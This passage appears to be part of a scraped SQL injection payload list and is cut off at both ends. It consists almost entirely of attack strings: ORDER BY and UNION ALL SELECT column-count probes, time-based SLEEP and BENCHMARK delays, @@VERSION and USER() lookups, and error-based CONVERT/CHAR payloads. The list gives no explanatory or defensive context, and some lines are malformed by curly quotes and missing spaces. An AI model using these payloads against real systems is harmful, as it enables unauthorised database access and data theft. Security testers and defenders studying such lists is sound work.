1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\u2013<br \/>\nUNION ALL SELECT 1<br \/>\nUNION ALL SELECT 1,2<br \/>\nUNION ALL SELECT 1,2,3<br \/>\nUNION ALL SELECT 1,2,3,4<br \/>\nUNION ALL SELECT 1,2,3,4,5<br \/>\nUNION ALL SELECT 1,2,3,4,5,6<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30<br \/>\nUNION ALL SELECT 1#<br \/>\nUNION ALL SELECT 1,2#<br \/>\nUNION ALL SELECT 1,2,3#<br \/>\nUNION ALL SELECT 1,2,3,4#<br \/>\nUNION ALL SELECT 1,2,3,4,5#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#<br \/>\nUNION ALL SELECT 1\u2013<br \/>\nUNION ALL SELECT 1,2\u2013<br \/>\nUNION ALL SELECT 1,2,3\u2013<br \/>\nUNION ALL SELECT 1,2,3,4\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\u2013<br \/>\nUNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\u2013<br \/>\nUNION SELECT @@VERSION,SLEEP(5),3<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),4<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30<br \/>\nUNION SELECT @@VERSION,SLEEP(5),\u201d\u20183<br \/>\nUNION SELECT @@VERSION,SLEEP(5),\u201d\u20183\u2032\u201d#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),4#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#<br \/>\nUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5(\u2018A\u2019)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#<br \/>\nUNION ALL SELECT USER()\u2013<br \/>\nUNION ALL SELECT SLEEP(5)\u2013<br \/>\nUNION ALL SELECT USER(),SLEEP(5)\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5)\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019))\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\u2013<br \/>\nUNION ALL SELECT NULL\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))\u2013<br \/>\nAND 